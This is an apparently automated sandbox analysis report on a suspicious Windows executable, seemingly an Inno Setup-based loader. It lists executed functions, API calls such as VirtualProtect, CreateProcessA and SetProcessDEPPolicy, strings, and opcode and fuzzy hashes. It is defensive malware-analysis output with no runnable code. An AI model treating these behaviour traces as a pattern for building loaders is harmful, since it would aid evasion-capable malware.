Source File: 00000006.00000002.1749527096.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1000000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd

Similarity

API ID: ProtectVirtual
String ID: &S!$<1i;
API String ID: 544645111-1770337207
Opcode ID: a502ff4844127aad62397f24c5c5966476eefb6a653ab25c1daf6539150e3f0c
Instruction ID: 10ce6abd714f0fd71461ea4209c89855fcc7ebd9d2627c504564f6b3c16dfac8
Opcode Fuzzy Hash: a502ff4844127aad62397f24c5c5966476eefb6a653ab25c1daf6539150e3f0c
Instruction Fuzzy Hash: C5C18E70A042598FDB12CFA9C9807EDFBF1BF49310F648599E499AB246C7349D41CFA4

Function 01000500 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03D43590,?,00000001,0000012C,?,?,?,00000000,00000000,?,01000A73,00000001,00000040), ref: 01000FD9

Memory Dump Source

Source File: 00000006.00000002.1749527096.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1000000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d689e76278027f09ca4baa36d9e68c63b5d75c55afc80b4c84edc4466778e854
Instruction ID: ee5868f694bf2ff4c88e81fd3430441f844052ed0736b413630e74565fda1f8c
Opcode Fuzzy Hash: d689e76278027f09ca4baa36d9e68c63b5d75c55afc80b4c84edc4466778e854
Instruction Fuzzy Hash: A821F2B590025DEFDB00CF9AC884BDEFBB4FB08310F10812AE918A7640C3B5A954CFA5

Function 00FAD005 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1727971767.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fad000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95738f4a4b66ccba6996d2ab637918e6aef4fffbb661469372f1e4fb6e45b7a3
Instruction ID: bd09a27d90f4a83c96893dc2caeef2113f6875b4248e9fa4f9a5c3de8dc95c6d
Opcode Fuzzy Hash: 95738f4a4b66ccba6996d2ab637918e6aef4fffbb661469372f1e4fb6e45b7a3
Instruction Fuzzy Hash: 7631E26140E3D08FD7138B258CA4662BF789F53224B1E84DBD889CF5ABC16A8849D772

Function 00FAD059 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1727971767.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fad000_JxvL46JFox50ORU3tEsaxZ2Y.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657dc2f6eb1d3cd61792a9802c578094de315817a8bf63ebb4fb34eab6569c08
Instruction ID: 98348148925323e6ccef92e77f038254893b60758cc4c7004b4f4394cbff1871
Opcode Fuzzy Hash: 657dc2f6eb1d3cd61792a9802c578094de315817a8bf63ebb4fb34eab6569c08
Instruction Fuzzy Hash: 7F01DBB15093449BE7204A65DD84767BBE8DF42334F18C41AED0A0F68AC3799845EA76

Analysis Process: kvOccCLzMNloI4W4GuGOaRuh.exePID: 7924, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	21.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	1520
Total number of Limit Nodes:	22

Executed Functions

Function 00409B78 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409B8A
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669

Function 0040520C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6

Strings

SetProcessDEPPolicy, xrefs: 004045B5
SetDllDirectoryW, xrefs: 00404589
kernel32.dll, xrefs: 0040457D
SetSearchPathMode, xrefs: 0040459F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

Function 0040AAB4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 0040AAC1

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,01F41E2C), ref: 0040966C

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
SetWindowLongA.USER32(00020408,000000FC,00409960), ref: 0040AB15
RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
DestroyWindow.USER32(00020408,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15

Strings

STATIC, xrefs: 0040AAF7
InnoSetupLdrWindow, xrefs: 0040AAF2
/SL5="$%x,%d,%d,, xrefs: 0040AB55

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3757039580-3001827809
Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4

Strings

Wow64RevertWow64FsRedirection, xrefs: 004090D4
shell32.dll, xrefs: 00409110
kernel32.dll, xrefs: 004090BF, 004090D9
Wow64DisableWow64FsRedirection, xrefs: 004090BA

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

Function 0040AAA2 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
SetWindowLongA.USER32(00020408,000000FC,00409960), ref: 0040AB15

Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94

Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000,00409ABF), ref: 00409A5C
Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000), ref: 00409A70
Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8), ref: 00409AA4

RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
DestroyWindow.USER32(00020408,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15

Strings

STATIC, xrefs: 0040AAF7
InnoSetupLdrWindow, xrefs: 0040AAF2
/SL5="$%x,%d,%d,, xrefs: 0040AB55

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3001827809
Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

Function 004099EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000,00409ABF), ref: 00409A5C
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000), ref: 00409A70
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8), ref: 00409AA4

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,01F41E2C), ref: 0040966C

Strings

D, xrefs: 00409A36

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Function 0040A814 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878

Strings

y@, xrefs: 0040A981
.tmp, xrefs: 0040A8BE

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

Function 0040A82F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878

Strings

y@, xrefs: 0040A981
.tmp, xrefs: 0040A8BE

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F

Strings

.tmp, xrefs: 0040935F

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017

Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406FAA
LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693

